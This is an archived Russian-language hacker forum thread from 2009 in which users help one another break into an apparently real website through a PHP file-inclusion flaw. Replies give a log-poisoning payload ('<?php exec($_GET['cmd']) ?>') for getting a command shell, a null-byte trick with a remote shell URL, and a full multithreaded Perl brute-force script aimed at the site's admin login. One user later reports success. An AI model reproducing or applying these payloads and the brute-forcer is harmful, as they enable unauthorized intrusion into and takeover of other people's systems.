Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Болталка (https://forum.antichat.xyz/forumdisplay.php?f=46)
-   -   Инклюд ) (https://forum.antichat.xyz/showthread.php?t=103364)

DeepBlue7 27.01.2009 21:21
Инклюд )
 
Вообщем нашел сайтег.... довольно популярный... там php инклюдинг... При вводе несуществующей страницы вылитает

Код:
Warning: include() [function.include]: URL file-access is disabled in the server configuration in /hosting/www/main/samp/v2/index.php on line 369

Warning: include(http://someweb.com/shell.php) [function.include]: failed to open stream: no suitable wrapper could be found in /hosting/www/main/samp/v2/index.php on line 369

Warning: include() [function.include]: Failed opening 'http://someweb.com/shell.php' for inclusion (include_path='.:/opt/lampp/lib/php') in /hosting/www/main/samp/v2/index.php on line 369


Инклюд типа

Код:
someweb.ru/v2/index.php?page=http://someweb.com/shell&lang=ru&PHPSESSID=0548fe13c6b6c63e4bbd59538e1c77da


Есть какие либо варианты как залить шелл ?

oRb 27.01.2009 21:37
Удаленный инклюд запрещен, попробуй залить шелл, к примеру, как картинку, и проинклюдь его.

ps: _http://www.dyc.lv ? :D

geezer.code 27.01.2009 21:42
попробуй залить через логи,
только учти попытка будет всего одна ;)
а потом проведи локальный инклуд.

DeepBlue7 27.01.2009 21:51
Цитата:
Сообщение от geezer.code
попробуй залить через логи,
только учти попытка будет всего одна ;)
а потом проведи локальный инклуд.
Эт как ? :P Что ты имееш в виду ? :D

geezer.code 27.01.2009 21:57
например делаешь запрос к существующей странице
www.site.com/index.php?myadd=<?php exec($_GET['cmd']) ?>

этот запрос должен попасть в access.log
после этого нужно этот аксес-лог проинклудить.

и по идее утебя получится мини шелл... после этого можешь уже загрузить чтото посущественнее.

eLWAux 27.01.2009 21:59
...или пробрути (perl; в password.txt пароли):
PHP код:
#! /usr/bin/perl -w

use IO::Socket;
use warnings;
use threads;
use threads::shared;
use Fcntl ':flock';

print "
 simple brute
 by eLwaux
       \n";

my $threads    10;
my $host 'dyc.lv';
my $login 'http://www.dyc.lv/v2/admins.php';

open (FILE'<password.txt') || die(" [-] icqmailc.com.pass.txt not found!\n");
my @pas shared = <FILE>;
chomp(@pas);
close(FILE);

$time      time
printf " [ ] started [".localtime()."]\n\n";

for(0..$threads) {$trl[$_] = threads->create(\&Brut$_);}
for(@trl) { $_->join; }

$time time-$time;
printf "\n [ ] finished [".localtime()."]\n";
printf " [i] time elapsed: $time sec\n";

<stdin>;

sub Brut{

    while(@pas)
    {    
        {lock(@pas);$pasw shift @pas;}        
    
        $post    'parole='.$pasw;
        $header  
               "POST ".$login." HTTP/1.1\r\n".
               "Host: ".$host."\r\n".
               "User-Agent: mde\r\n".
               "Referer: ".$login."\r\n".
               "Cookie: hello=world;\r\n".
               "Content-Length: ".length($post)."\r\n\r\n".
               "$post\r\n\r\n";
        
        my $sock sock();
        print $sock $header;            

        my $answ;
        while(my $answer = <$sock>){$answ.=$answer;}
        
        if (length($answ)==947) {print ' - ';}
        else {print ' +++++++++++ ';}
        print $pasw."\n";
                
        close($sock);        
    }
}

#create new socket connection
sub sock {
    my $sock;
    do {
        $sock = new IO::Socket::INET 
            (
                PeerAddr => $host,
                   PeerPort => 80,
                   PeerProto => 'tcp'
                   TimeOut => 10
            ) or print "[-] connection error!";
        } while (!$sock);
    return $sock;

:D

DeepBlue7 27.01.2009 22:02
Да в том то и прикол что он после названия добавляет еще и .php

eLWAux 27.01.2009 22:06
%00
?cmd=http://site.ua/shell.php?

Daboy 05.03.2009 00:13
УРА! Спасибо у меня получилось.
Скрин:
http://bildem.lv/bildes/04c347ced80b...263bf7f6cc.JPG
А у вас?

Tigger 05.03.2009 00:20
Сбрутил что ли? о_0


Время: 16:06